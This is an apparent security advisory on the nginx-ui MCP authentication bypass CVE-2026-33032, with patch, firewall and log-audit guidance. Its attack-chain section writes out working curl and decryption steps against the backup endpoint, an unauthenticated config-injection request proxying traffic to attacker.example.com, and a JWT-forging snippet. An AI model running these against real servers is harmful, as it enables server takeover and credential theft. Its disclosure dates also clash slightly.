If you run nginx on Linux and use nginx-ui to manage it, you need to read this. A vulnerability disclosed in late March 2026 -- tracked as CVE-2026-33032, CVSS 9.8 -- has been under active exploitation in the wild. The flaw is not subtle. A single missing function call in nginx-ui's Model Context Protocol (MCP) integration left an entire command endpoint wide open, no credentials required. Pluto Security named the exploit technique MCPwn, and the name is apt: the right two HTTP requests from any network host give an attacker full write control over your nginx configuration, with automatic reloads to apply whatever they injected.
This article covers what nginx-ui is, what MCP is doing inside it, exactly how the attack chain works, what an attacker can accomplish once they have access, and what you need to do right now on your Linux system to close the exposure.
CVE-2026-33032 has been added to VulnCheck's Known Exploited Vulnerabilities (KEV) list. Recorded Future's Insikt Group flagged it as one of 31 high-impact CVEs actively exploited in March 2026, assigning it a risk score of 94 out of 100. PoC exploit code is publicly available. Patch immediately: the current secure version is nginx-ui 2.3.6.
What Is nginx-ui?
nginx itself is just a binary that reads configuration files. On a Linux server, managing those files -- adding server blocks, setting up upstream proxies, toggling modules, watching error logs -- is done at the command line. nginx-ui is a third-party web-based dashboard built on Go and Vue that wraps all of that into a graphical interface, complete with real-time log streaming, cluster management, SSL certificate handling, and AI-assisted configuration generation via ChatGPT integration.
It is not an official nginx project. It is a community tool that has grown to over 11,000 stars on GitHub and more than 430,000 Docker pulls. Many of those deployments run on the default port 9000. When Pluto Security researchers scanned Shodan at the time of discovery, they identified approximately 2,689 publicly reachable instances. By the time of public disclosure in April 2026, more recent scans cited by BleepingComputer and SecurityWeek placed the figure at approximately 2,600 -- a count that shifts daily as instances are patched or exposed. Every unpatched instance in that population was an open target.
The Docker pull count -- over 430,000 -- suggests the true population of vulnerable deployments is far larger than the 2,600--2,689 publicly reachable instances identified in internet scans. Many more sit behind firewalls, where they remain reachable by internal attackers or from compromised neighboring hosts.
What Is MCP and Why Was It Added?
Model Context Protocol (MCP) is a standard for connecting AI assistants to applications. It allows a language model to call application functions directly -- rather than just generating text, the model can take action. In nginx-ui's case, MCP support means a connected AI assistant can add a reverse proxy rule, reload nginx, or read configuration files as direct operations rather than generating configuration text for a human to paste in.
The appeal is obvious. The risk is structural. When you bolt MCP onto an existing application, you are exposing the application's full capability set through a new set of HTTP endpoints. Every privileged action the application can perform -- config writes, service restarts, file reads -- becomes reachable via the MCP transport layer. If that transport layer does not inherit the same authentication controls as the rest of the application, those privileged actions become unauthenticated actions.
That is precisely what happened in nginx-ui.
Pluto Security researcher Yotam Perkal described the structural problem precisely: MCP endpoints inherit an application's full capabilities without necessarily inheriting its security controls -- turning a new integration feature into what Perkal called "a backdoor that bypasses every authentication mechanism."
The Vulnerability: One Missing Middleware Call
nginx-ui uses the SSE (Server-Sent Events) transport from the mcp-go library. This splits MCP communication across two HTTP endpoints:
- GET /mcp -- Opens a persistent SSE stream. The client connects here to receive responses and is assigned a session ID. This endpoint enforces both IP whitelisting and AuthRequired() middleware.
- POST /mcp_message -- Accepts JSON-RPC tool invocations. Every config write, every nginx restart, every file read goes through here. This endpoint enforces IP whitelisting only -- and the default whitelist is empty, meaning allow-all.
Here is the complete MCP router from the vulnerable codebase (mcp/router.go, v2.3.3 and earlier). Read the two route registrations carefully:
```go
// mcp/router.go (vulnerable version - v2.3.3 and earlier)
func InitRouter(r *gin.Engine) {
	r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), func(c *gin.Context) {
		mcp.ServeHTTP(c)
	})
	r.Any("/mcp_message", middleware.IPWhiteList(), func(c *gin.Context) {
		mcp.ServeHTTP(c)
	})
}
```
/mcp has IPWhiteList() and AuthRequired(). /mcp_message has IPWhiteList() only. Both route to the exact same handler function -- mcp.ServeHTTP(c) -- but /mcp_message, the endpoint where every destructive operation executes, skips authentication entirely.
The second line of defense, the IP whitelist, has its own fatal default. The relevant logic in internal/middleware/ip_whitelist.go:
```go
// internal/middleware/ip_whitelist.go (vulnerable version)
if len(settings.AuthSettings.IPWhiteList) == 0 ||
	clientIP == "" ||
	clientIP == "127.0.0.1" || clientIP == "::1" {
	c.Next() // Empty whitelist = allow everyone; localhost always bypasses
	return
}
```
The full condition passes the request through when the whitelist is empty, when the client IP cannot be resolved, or when the caller is localhost (127.0.0.1 or ::1). c.Next() is Gin's signal to proceed to the next handler. Every fresh nginx-ui installation ships with an empty whitelist, so the first condition fires for all non-localhost callers -- and localhost always bypasses the check regardless of whitelist configuration. Two security mechanisms, both fail-open by default. The result: any host on the network can invoke any MCP tool against a default deployment.
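The fail-open default is easier to reason about in isolation. The following is a minimal Python model of the check, not the actual Go middleware -- the function names are illustrative, but the branch logic mirrors the condition quoted above:

```python
def ip_whitelist_allows(whitelist, client_ip):
    """Model of the vulnerable fail-open check (illustrative, not the real Go code)."""
    if len(whitelist) == 0 or client_ip == "" or client_ip in ("127.0.0.1", "::1"):
        return True  # empty whitelist = allow everyone; localhost always bypasses
    return client_ip in whitelist

def ip_whitelist_allows_fixed(whitelist, client_ip):
    """Fail-closed variant: an empty whitelist denies all remote callers."""
    if client_ip in ("127.0.0.1", "::1"):
        return True  # localhost still trusted
    return client_ip in whitelist  # empty list matches nothing -> deny

# Default install: empty whitelist, remote attacker IP
assert ip_whitelist_allows([], "203.0.113.7") is True         # fail-open: allowed
assert ip_whitelist_allows_fixed([], "203.0.113.7") is False  # fail-closed: denied
```

The fixed variant encodes the principle the patch later adopted: an unconfigured allowlist should mean "nobody remote," not "everybody."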
The fix in commit 413dc63 (v2.3.4, released March 15, 2026) added exactly 27 characters: , middleware.AuthRequired() to the /mcp_message route registration. The same middleware that /mcp already had. The commit also added a regression test (mcp/router_test.go) that explicitly verifies both endpoints return HTTP 403 when accessed without authentication -- a test that would have caught the original vulnerability had it existed during development.
```go
func TestMCPEndpointsRequireAuthentication(t *testing.T) {
	settings.AuthSettings.IPWhiteList = nil
	router := gin.New()
	InitRouter(router)
	for _, endpoint := range []string{"/mcp", "/mcp_message"} {
		req := httptest.NewRequest(http.MethodPost, endpoint, nil)
		w := httptest.NewRecorder()
		router.ServeHTTP(w, req)
		assert.Equal(t, http.StatusForbidden, w.Code)
	}
}
```
There is a known inconsistency in official version metadata. The OSV entry for CVE-2026-33032 lists v2.3.5 as the last affected version; the GHSA advisory (GHSA-h6c2-x2m2-mwhf) lists versions <=1.99. Both are incorrect. Pluto Security's source code verification confirms: v2.3.3 is the last vulnerable version and v2.3.4 contains the fix. To avoid ambiguity from these data inconsistencies, update to the current latest release, v2.3.6.
All 12 Exposed MCP Tools
The unauthenticated /mcp_message endpoint exposes 12 named tools split into two categories. The tool names used in JSON-RPC invocations are exact -- these are the strings you would see in access logs or network captures of an active exploitation attempt:
| Tool Name | Type | Capability |
|---|---|---|
| nginx_config_add | destructive | Create config files + auto-reload nginx immediately |
| nginx_config_modify | destructive | Modify any existing config file |
| nginx_config_enable | destructive | Enable or disable site configurations |
| nginx_config_rename | destructive | Rename config files |
| nginx_config_mkdir | destructive | Create directories in the config tree |
| reload_nginx | destructive | Reload nginx configuration gracefully |
| restart_nginx | destructive | Restart the nginx process entirely |
| nginx_config_get | read-only | Read any config file contents |
| nginx_config_list | read-only | Enumerate all configuration files |
| nginx_config_base_path | read-only | Retrieve the config directory path |
| nginx_config_history | read-only | View configuration change history |
| nginx_status | read-only | Read nginx server status |
Pay particular attention to nginx_config_add. It does not just write a file -- it triggers an automatic nginx reload after writing. Config injection and service activation happen in a single unauthenticated API call, with no second step required.
The Full Attack Chain
Exploiting CVE-2026-33032 in its simplest form requires only network access and two HTTP requests. There is also a companion vulnerability -- CVE-2026-27944, also CVSS 9.8 -- that collapses the one remaining barrier for fully default deployments.
How the SSE session transport works
Understanding the attack requires understanding what the GET /mcp response looks like in practice. When a client connects to open the SSE stream, the server sends back an event in this exact format:
```
# The server responds with an SSE event containing the message endpoint URL
# The sessionId embedded in the data field is what the attacker reuses
event: endpoint
data: /mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f
```
That session ID is a UUID the server generates and associates with the SSE stream. From that point forward, tool invocations are POSTed to /mcp_message?sessionId=<uuid> and responses flow back through the still-open SSE stream. The node_secret query parameter is what nginx-ui uses to authenticate the initial GET /mcp session -- it is not re-checked on subsequent /mcp_message calls. Once the session UUID is obtained, node_secret is no longer needed.
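For defenders building detection or audit tooling, the handshake is straightforward to parse. This is a small Python sketch based on the event format shown above; the function name and the example event text are mine, not part of nginx-ui:

```python
import re

def parse_sse_endpoint_event(raw: str) -> str:
    """Extract the sessionId UUID from an MCP SSE 'endpoint' event."""
    for line in raw.splitlines():
        if line.startswith("data:"):
            m = re.search(r"sessionId=([0-9a-f-]{36})", line)
            if m:
                return m.group(1)
    raise ValueError("no endpoint event with a sessionId found")

event = "event: endpoint\ndata: /mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f"
print(parse_sse_endpoint_event(event))
# 4f4cdb82-152b-4c10-8f63-1df90e1e061f
```

The same pattern works in reverse for log review: grepping captured traffic for `sessionId=` UUIDs on /mcp_message requests reveals active sessions.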
Step 1: Obtain node_secret via CVE-2026-27944
On a fully default deployment, the attacker cannot call GET /mcp directly because it requires a valid node_secret. CVE-2026-27944 (CVSS 9.8, affects versions prior to 2.3.3) eliminates this barrier. The /api/backup endpoint is accessible without authentication, and the server makes decryption trivial: the AES-256 encryption key and IV are returned in plaintext in the X-Backup-Security response header alongside the encrypted backup archive. An attacker downloads the backup with a single GET request, reads the decryption key from the response header, and decrypts the archive to obtain the complete nginx-ui data set including user credentials, session tokens, SSL private keys, all nginx configuration files, and the node_secret credential used to authenticate the MCP session.
```bash
# CVE-2026-27944: unauthenticated backup download + key disclosure

# Step 1: Download encrypted backup -- AES-256 key and IV in X-Backup-Security header
$ curl -sD headers.txt http://TARGET:9000/api/backup -o backup.zip
$ grep X-Backup-Security headers.txt
# X-Backup-Security: BASE64_AES_KEY:BASE64_IV

# Step 2: Decrypt the backup using the disclosed key
$ python3 -c "
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
key = base64.b64decode('BASE64_AES_KEY')
iv = base64.b64decode('BASE64_IV')
with open('backup.zip','rb') as f:
    data = f.read()
dec = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()).decryptor()
open('decrypted.zip','wb').write(dec.update(data) + dec.finalize())
"

# Step 3: Extract node_secret from the decrypted archive
$ unzip -p decrypted.zip app.db | strings -n 8 | grep node_secret

# Step 4: Use node_secret to open an authenticated SSE session on /mcp
$ curl -N "http://TARGET:9000/mcp?node_secret=RECOVERED_SECRET"
# event: endpoint
# data: /mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f
```
On many containerized deployments, node_secret is also present in environment variables, Docker Compose files, and Kubernetes secrets accessible from a compromised neighboring workload. An attacker with any foothold in the same cluster may not need CVE-2026-27944 at all -- node_secret leaks through multiple channels in typical deployment patterns, so any exposure of the nginx-ui management port should be treated as sufficient for session establishment.
Step 2: Invoke tools via unauthenticated /mcp_message
With a valid session UUID, the attacker sends POST requests directly to /mcp_message. The session ID is the only token presented. No node_secret. No JWT. No cookies. The /mcp_message route has no AuthRequired() call, so the Gin middleware chain passes the request straight through to the handler. This is not a logic flaw or a bypass -- it is a missing check that was simply never written.
```bash
# Full exploitation demonstrated from a separate machine on the network
# Attacker: 172.21.0.3 | Target nginx-ui: 172.21.0.2:9000
# No authentication header, cookie, or node_secret is sent
$ curl -s -X POST "http://172.21.0.2:9000/mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
      "name": "nginx_config_add",
      "arguments": {
        "name": "attacker_injected",
        "content": "server { listen 80 default_server; server_name _; location / { proxy_pass http://attacker.example.com; } }"
      }
    }
  }'

# nginx-ui writes the config file to disk and triggers an immediate reload
# The attacker-controlled proxy is live on the server with no further steps
```
Pluto Security's PoC ran this from a container at 172.21.0.3 against a target at 172.21.0.2 -- a completely separate host, not localhost. The PoC enumerated all 12 tools, read the existing nginx.conf, injected a new server block, and confirmed nginx auto-reloaded with the malicious configuration, all in a single automated run with zero credentials presented at any point to /mcp_message.
What an Attacker Can Do
Full unauthenticated access to nginx-ui's MCP tools translates to a wide range of concrete post-exploitation capabilities on the Linux host running nginx:
Traffic interception and credential capture
By rewriting server blocks to route traffic through an attacker-controlled upstream, the attacker can transparently proxy all HTTP and HTTPS traffic passing through the server.
Custom access_log directives with a crafted log_format pattern can be injected to write Authorization header values directly to a file. Every administrator who logs into nginx-ui while that logging directive is active has their credentials captured.
JWT escalation to permanent access
This is the step that makes the attack durable beyond the initial session. Once an administrator's captured JWT is in hand, the attacker can call the nginx-ui settings API to extract the JwtSecret used to sign all tokens. With that secret, they can forge valid admin JWT tokens for any user account and maintain persistent administrative access that survives configuration cleanup -- even after the original vulnerability is patched and the MCP endpoint is locked down.
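Why secret extraction defeats later cleanup is clearest from how HS256 tokens are signed: possession of the signing secret is possession of the minting authority. The following is an illustrative stdlib-only sketch of the forgery primitive -- it is not nginx-ui's actual token code, and the claim names and secret value are made up:

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    # JWT uses unpadded base64url encoding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_jwt(jwt_secret: bytes, claims: dict) -> str:
    """Anyone holding the HS256 signing secret can mint tokens the server
    cannot distinguish from legitimate ones."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = b64url(hmac.new(jwt_secret, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"

token = forge_jwt(b"stolen-JwtSecret", {"sub": "admin", "exp": 4102444800})

# A server holding the same secret recomputes the signature and finds it valid
h, p, s = token.split(".")
assert s == b64url(hmac.new(b"stolen-JwtSecret", f"{h}.{p}".encode(), hashlib.sha256).digest())
```

This is why rotating JwtSecret, not just patching, is mandatory after suspected compromise: every token signed under the old secret, forged or legitimate, validates until the secret changes.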
Configuration exfiltration and topology mapping
The nginx_config_list and nginx_config_get tools expose the complete set of configuration files, revealing upstream server addresses, internal service names, TLS certificate paths, and any credentials embedded in configuration.
The nginx_config_history tool reveals the full change log. The read-only tools provide a complete architectural map of everything sitting behind nginx.
Service disruption
Writing a syntactically valid but semantically destructive config -- such as one that removes all server blocks -- and triggering a reload with reload_nginx takes nginx offline cleanly.
Because nginx validates configuration before applying it, an invalid config fails gracefully without crashing the process, but a valid config that removes all listeners achieves the same result: no traffic is served.
Persistent backdoor placement
Configuration files written via nginx_config_add persist across nginx restarts.
An attacker can embed a persistent redirect or proxy rule that survives service restarts and remains in place after the initial access vector is patched, unless administrators audit and clean all configuration files. The nginx_config_history tool -- which the attacker also has read access to -- can be used to identify the oldest configuration files and understand how to blend injected configs into the existing history.
Updating nginx-ui does not remove malicious configuration files already on disk. It does not revoke forged JWTs if JwtSecret was extracted. Review all nginx configuration files in /etc/nginx/, conf.d/, and sites-enabled/ for unauthorized additions. Unexpected proxy_pass directives, custom access_log entries, and unfamiliar server blocks are indicators of post-exploitation activity. Rotate JwtSecret if you suspect the settings API was accessed.
Why This Hits Linux Administrators Hard
nginx is overwhelmingly a Linux workload. nginx-ui was built for Linux servers. The default deployment model -- Docker container or direct binary on port 9000 -- means this dashboard is often running on the same host as production nginx, sometimes exposed directly to the internet without a separate management network.
Pluto Security identified exposed instances using a technique worth understanding: Shodan favicon hash fingerprinting.
nginx-ui's favicon has a consistent hash of -1565173320, queryable as http.favicon.hash:-1565173320 in Shodan. This is more reliable than scanning for service banners because the favicon is served even when the application is otherwise unconfigured or the login page gives no version information. At the time of Pluto Security's initial scan, the technique returned 2,689 instances spread across more than 50 countries, running primarily on Alibaba Cloud, Oracle Cloud, Tencent Cloud, and DigitalOcean, with the large majority on the default port 9000. By the time of public disclosure, BleepingComputer reported the count at approximately 2,600, reflecting ongoing patching activity -- the number is a moving target as administrators respond to the public advisory.
The Docker deployment pattern is particularly telling. The image (uozi/nginx-ui on Docker Hub) has over 430,000 pulls. Many of those containers are spun up quickly, added to a docker-compose setup, and never hardened further. Port 9000 gets exposed to 0.0.0.0, MCP support gets enabled because the AI integration features are compelling, and the security posture of the container mirrors the default nginx-ui configuration -- which is fail-open on IP whitelisting.
Linux firewall rules should have been the backstop. In many of these deployments, they were not.
The Broader MCP Security Problem
CVE-2026-33032 is the second major MCP vulnerability Pluto Security has disclosed as part of a continuing research effort mapping risk across the MCP ecosystem. The first was MCPwnfluence -- CVE-2026-27825 (CVSS 9.1) and CVE-2026-27826 (CVSS 8.2) in the widely deployed mcp-atlassian server. MCPwnfluence chains an SSRF with a file upload path to achieve full unauthenticated RCE from any host on the local network. The two research findings are distinct vulnerabilities in different products and are not technically chained with each other -- they share a class of failure, not an attack path.
Pluto's researchers note they are finding the same structural weaknesses across multiple MCP server implementations they have examined:
- Authentication on the SSE connection endpoint, but not on the message endpoint -- the exact pattern in CVE-2026-33032
- IP allowlists that default to allow-all when the list is empty, rather than failing closed
- Security controls documented in README files but implemented as dead code never reached at runtime
- OAuth scopes advertised in configuration but never validated when tool invocations arrive
The SSE transport design makes this class of mistake intuitive to introduce. Developers reason about the SSE stream as the "connection" that needs protecting -- it is the thing that establishes the session, like a handshake. The message endpoint feels like a data pipe, not a privileged surface. But in MCP's architecture, the message endpoint is where all power is exercised. Locking the stream endpoint while leaving the message endpoint open is equivalent to requiring a key to enter the building lobby but leaving all the server rooms unlocked inside it.
Treat every MCP endpoint as a privileged API. Audit both SSE endpoints -- the stream connection and the message handler -- and write explicit authentication tests for the message endpoint. The regression test added in nginx-ui commit 413dc63 is a usable template: assert that both /mcp and /mcp_message return HTTP 403 when hit without credentials. IP allowlists should default to fail-closed, not fail-open. There is no passive MCP endpoint -- every tool invocation path can be weaponized.
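The regression-test idea generalizes beyond Go. A toy Python model of the two route tables (the handler and middleware names here are hypothetical, chosen to mirror the pattern, not nginx-ui's code) shows exactly what such a test asserts:

```python
def auth_required(handler):
    """Middleware sketch: reject unauthenticated requests before the handler runs."""
    def wrapped(request):
        if not request.get("authenticated"):
            return 403
        return handler(request)
    return wrapped

def serve_mcp(request):
    return 200  # stand-in for the shared MCP handler

# The vulnerable shape: same handler, auth applied to only one route
routes_vulnerable = {
    "/mcp": auth_required(serve_mcp),  # stream endpoint: protected
    "/mcp_message": serve_mcp,         # message endpoint: middleware forgotten
}

# The fixed shape: every route that reaches the handler goes through auth
routes_fixed = {path: auth_required(serve_mcp) for path in ("/mcp", "/mcp_message")}

anon = {"authenticated": False}
assert routes_vulnerable["/mcp_message"](anon) == 200  # unauthenticated tool call succeeds
assert routes_fixed["/mcp_message"](anon) == 403       # both endpoints now require auth
```

The test worth writing is the last two lines: iterate every registered route and assert the anonymous request is rejected, so a newly added endpoint cannot silently ship without the middleware.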
MITRE ATT&CK Technique Mapping
The full MCPwn attack chain maps to nine MITRE ATT&CK techniques across seven tactics. The table below maps each stage of the documented exploit to its corresponding technique ID.
| Technique | ID | Tactic | How It Applies |
|---|---|---|---|
| Exploit Public-Facing Application | T1190 | Initial Access | Unauthenticated POST to /mcp_message exploits the missing AuthRequired() middleware to gain immediate privileged access to the nginx server |
| Active Scanning: Vulnerability Scanning | T1595.002 | Reconnaissance | Shodan favicon hash fingerprinting (http.favicon.hash:-1565173320) to identify and enumerate exposed nginx-ui instances at scale |
| Unsecured Credentials: Credentials In Files | T1552.001 | Credential Access | Unauthenticated download of /api/backup (CVE-2026-27944) yields node_secret, user credentials, and SSL private keys from the unprotected backup archive |
| Input Capture: Web Portal Capture | T1056.003 | Credential Access | Injecting a crafted log_format directive that writes Authorization header values to disk, capturing credentials of every user who authenticates while the directive is active |
| Steal Application Access Token | T1528 | Credential Access | Extracting JwtSecret from the nginx-ui settings API and using it to forge persistent admin JWT tokens valid for any user account |
| File and Directory Discovery | T1083 | Discovery | nginx_config_list, nginx_config_get, and nginx_config_history tools enumerate all configuration files, revealing internal topology, upstream addresses, TLS certificate paths, and embedded credentials |
| Adversary-in-the-Middle | T1557 | Collection | Rewriting server blocks to route HTTP/S traffic through an attacker-controlled upstream proxy for transparent interception of all traffic through the server |
| Server Software Component: Web Shell | T1505.003 | Persistence | Malicious nginx configuration files written via nginx_config_add persist across service restarts and survive patching, establishing durable backdoor access to all traffic the server handles |
| Endpoint Denial of Service | T1499 | Impact | Writing a configuration that removes all server blocks and triggering reload_nginx takes the server offline without crashing the nginx process -- nginx validates and applies the empty config cleanly |
Remediation and Hardening on Linux
The primary fix is straightforward: update nginx-ui. The vulnerability was patched in version 2.3.4, released March 15, 2026, one day after responsible disclosure. The current secure version is 2.3.6. The patch adds AuthRequired() middleware to the /mcp_message route and changes the default IP allowlist behavior from fail-open to fail-closed.
```bash
# Check installed version (direct binary)
$ nginx-ui --version

# Check version in Docker container
$ docker exec nginx-ui nginx-ui --version

# Any version below 2.3.4 is vulnerable to CVE-2026-33032
# Any version below 2.3.3 is also vulnerable to CVE-2026-27944 (backup exposure)
```
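If you script this check across a fleet, compare versions numerically, not lexicographically -- as strings, "2.10.0" sorts before "2.3.4" and would be misclassified. A small Python sketch using the version boundaries stated above (the function names are mine):

```python
def parse_version(v: str) -> tuple:
    """Parse 'v2.3.4' or '2.3.4' into a comparable numeric tuple."""
    return tuple(int(p) for p in v.lstrip("v").split("."))

def is_vulnerable_33032(v: str) -> bool:
    """True if the version predates the 2.3.4 fix for CVE-2026-33032."""
    return parse_version(v) < (2, 3, 4)

def is_vulnerable_27944(v: str) -> bool:
    """True if the version predates 2.3.3, which closed the backup exposure."""
    return parse_version(v) < (2, 3, 3)

# String comparison gets this wrong; tuple comparison does not
assert "2.10.0" < "2.3.4"                       # lexicographic: misleading
assert is_vulnerable_33032("2.10.0") is False   # numeric: correct
assert is_vulnerable_33032("2.3.3") is True
assert is_vulnerable_27944("2.3.3") is False
```

Pre-release suffixes (e.g. "2.3.4-rc1") would need extra handling; for plain dotted releases the tuple comparison is sufficient.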
If you cannot patch immediately, the following interim mitigations reduce exposure while you prepare the update.
Block MCP access if you are not using it
nginx-ui has no configuration directive to disable the MCP endpoints entirely -- the /mcp and /mcp_message routes are compiled into the binary and always registered. If you are not using the MCP feature, the correct approach is to prevent access at the network level by restricting port 9000 with firewall rules (see below) and setting an explicit IP allowlist so that no external host can reach the MCP endpoints. This eliminates the attack surface without requiring a configuration toggle that does not exist.
Lock down the IP allowlist
Set an explicit IP allowlist in /usr/local/etc/nginx-ui/app.ini under the [auth] section. An empty IPWhiteList defaults to allow-all -- this is the configuration that makes the exploit trivially reachable from any network host. Each entry is a separate line. Once any entry is set, only those IPs and 127.0.0.1 can reach the nginx-ui interface at all:
```ini
# /usr/local/etc/nginx-ui/app.ini
# Add the [auth] section if it does not already exist
[auth]
# Add one IPWhiteList entry per line for each trusted management IP
# IPv4 and IPv6 are both supported
IPWhiteList = 192.168.1.10
IPWhiteList = 10.0.0.5

# After editing, restart nginx-ui to apply:
# systemctl restart nginx-ui
```
Note that 127.0.0.1 is always allowed regardless of the allowlist -- this is hardcoded in the middleware, not configurable. This means any process running on the same host can still reach the management interface. The allowlist protects against remote attackers, not local privilege escalation.
Restrict port 9000 at the Linux firewall
nginx-ui should never be reachable from the public internet. Use nftables or iptables to limit access to port 9000 to trusted source addresses only. The following nftables example drops all traffic to port 9000 except from a specific management address:
```
# These rules are a standalone example showing the port 9000 restriction pattern.
# Merge these rules into your existing /etc/nftables.conf rather than replacing it.
# On a server with existing rules, adding a second filter table of the same name will
# conflict. Add the port 9000 accept/drop rules to your existing input chain instead.
# Test first: nft -c -f /etc/nftables.conf -- then apply: systemctl reload nftables
table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;

        # Always accept loopback traffic
        iif lo accept

        # Drop invalid conntrack state early
        ct state invalid drop

        # Allow established and related connections
        ct state established,related accept

        # Allow nginx-ui only from management host (IPv4)
        # If your management host uses IPv6, add: ip6 saddr <mgmt-ipv6> tcp dport 9000 accept
        ip saddr 192.168.1.10 tcp dport 9000 accept

        # Drop all other traffic to port 9000
        tcp dport 9000 drop

        # Allow nginx itself on 80/443
        tcp dport { 80, 443 } accept
    }
}
```
The equivalent iptables rules:

```bash
# Allow port 9000 only from management IP, drop everything else
iptables -A INPUT -s 192.168.1.10 -p tcp --dport 9000 -j ACCEPT
iptables -A INPUT -p tcp --dport 9000 -j DROP

# Make persistent -- requires the iptables-persistent package
# Install if needed: apt install iptables-persistent
netfilter-persistent save
```
Audit nginx configuration for post-exploitation indicators
If your nginx-ui instance was exposed prior to patching, treat it as potentially compromised. Review all configuration files nginx-ui manages:
```bash
# List all nginx config files and their modification times
# -printf is GNU findutils only (standard on Linux; not available on BSD/macOS)
$ find /etc/nginx/ -name "*.conf" -printf "%T+ %p\n" | sort

# Look for unexpected proxy_pass directives pointing to external hosts
$ grep -r "proxy_pass" /etc/nginx/ --include="*.conf"

# Look for unexpected access_log directives (credential harvesting indicator)
$ grep -r "access_log" /etc/nginx/ --include="*.conf"

# Check nginx-ui access logs for MCP and backup requests
# Matches /mcp (SSE session open), /mcp_message (tool invocations), and /api/backup
$ grep -E "/(mcp|api/backup)" /var/log/nginx-ui/access.log

# Look for /api/backup access in nginx access logs (CVE-2026-27944 indicator)
# Any 200 response to /api/backup from an external IP indicates successful exploitation
$ grep "api/backup" /var/log/nginx/access.log
```
How to Remediate CVE-2026-33032 on Linux
Step 1: Update nginx-ui to version 2.3.6 or later
Update nginx-ui to at least version 2.3.4, which patches CVE-2026-33032 by adding the missing AuthRequired() middleware to the /mcp_message route. Version 2.3.6 is the latest secure release as of April 2026. Use the nginx-ui GitHub releases page or the official installation script to obtain the update. The patch is a one-line change, but it is the only complete fix -- interim mitigations reduce exposure but do not close the vulnerability.
Step 2: Set an explicit IP allowlist in app.ini
Add an IPWhiteList entry under the [auth] section of /usr/local/etc/nginx-ui/app.ini for each trusted management IP address. An empty allowlist defaults to allow-all. Once any entry is set, only those IPs and localhost can reach the nginx-ui management interface. Restart nginx-ui after editing: systemctl restart nginx-ui. This is a defense-in-depth measure, not a replacement for patching -- the CVE exploits /mcp_message directly, and the allowlist check on that endpoint was also fail-open in vulnerable versions.
Step 3: Restrict access to nginx-ui port 9000 at the Linux firewall
Use nftables or iptables to block public access to port 9000, the default nginx-ui port. Only trusted management network CIDR ranges should be able to reach it. This is the single most effective interim mitigation if you cannot patch immediately -- an attacker who cannot reach port 9000 cannot exploit the vulnerability regardless of nginx-ui's internal state.
Step 4: Audit nginx access logs for exploitation indicators
If your nginx-ui instance was reachable before patching, treat it as potentially compromised. Check nginx-ui access logs for GET requests to /mcp, POST requests to /mcp_message, and GET requests to /api/backup. In nginx configuration files, look for unexpected proxy_pass directives pointing to external hosts, custom access_log entries logging request headers, and unfamiliar server blocks added to conf.d/ or sites-enabled/. Rotate JwtSecret and node_secret if exploitation is suspected.
Frequently Asked Questions
What is CVE-2026-33032 and why does it have a CVSS score of 9.8?
CVE-2026-33032 is an authentication bypass vulnerability in nginx-ui, a web-based management interface for the nginx web server. It scores 9.8 on the CVSS scale because it requires no authentication, no user interaction, and no special privileges to exploit -- any network-adjacent attacker can send two HTTP requests and gain full administrative control over the nginx service, including the ability to write configuration files and trigger immediate reloads.
What is the MCPwn attack and how does it work against nginx-ui?
MCPwn is the name Pluto Security gave to the CVE-2026-33032 exploit chain. nginx-ui added Model Context Protocol (MCP) support, which splits communication across two HTTP endpoints: GET /mcp to establish a session, and POST /mcp_message to send tool commands. The /mcp endpoint enforces authentication; the /mcp_message endpoint does not. An attacker first exploits a companion vulnerability (CVE-2026-27944) to download a backup archive containing the node_secret credential, uses that to obtain a valid session ID from /mcp, and then calls /mcp_message freely to invoke any of the 12 exposed MCP tools -- including configuration writes with automatic nginx reload.
How do I check if my Linux nginx-ui installation is vulnerable to CVE-2026-33032?
Run nginx-ui --version or check the installed package version on your Linux system. Any version prior to 2.3.4 is vulnerable to CVE-2026-33032. Note that the MCP endpoints are compiled into the binary and always registered -- there is no mcp configuration directive to check, so the installed version alone determines exposure. If the instance is publicly reachable on its default port 9000, treat it as actively at risk until patched.
What should I do right now if I cannot immediately patch nginx-ui on my Linux server?
If you cannot update to nginx-ui 2.3.4 or later immediately, note that nginx-ui has no configuration directive to disable MCP -- the endpoints are always registered. The most effective interim step is to block port 9000 at the firewall so the endpoint cannot be reached from the network. Additionally, set an explicit IPWhiteList in the [auth] section of app.ini to restrict access to trusted management IPs, and monitor nginx-ui access logs for unexpected requests to the /mcp, /mcp_message, and /api/backup endpoints.
Wrapping Up
CVE-2026-33032 is a textbook example of what happens when AI integration features are shipped without giving their transport layer the same security scrutiny as the rest of the application. nginx-ui added MCP support because the capability is genuinely useful -- an AI assistant that can directly manipulate nginx configuration is a real productivity gain for administrators. But the /mcp_message endpoint went live without the AuthRequired() call that every other privileged route in the application carries. One function. CVSS 9.8.
The broader lesson is one that will keep recurring as AI integration becomes standard practice. MCP endpoints, like any other API surface that exposes privileged operations, need the same threat modeling, authentication controls, and network-level access restrictions as the most sensitive parts of the application they are attached to. There is no passive MCP endpoint. Every tool invocation path can be weaponized, and the attacker does not care whether it was added for an AI assistant or a human operator.
If you run nginx-ui on Linux: update to 2.3.6, lock down port 9000 at the firewall, set a real IP allowlist, and audit your configuration files. If you have been exposed, assume the worst, audit everything nginx-ui manages, and rotate JwtSecret.
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-03-04 | Vulnerability discovered by Pluto Security researcher Yotam Perkal during MCP ecosystem research |
| 2026-03-04 | Reported to nginx-ui maintainers via GitHub Private Vulnerability Reporting |
| 2026-03-14 | Fix committed by maintainers (commit 413dc63), including regression test mcp/router_test.go |
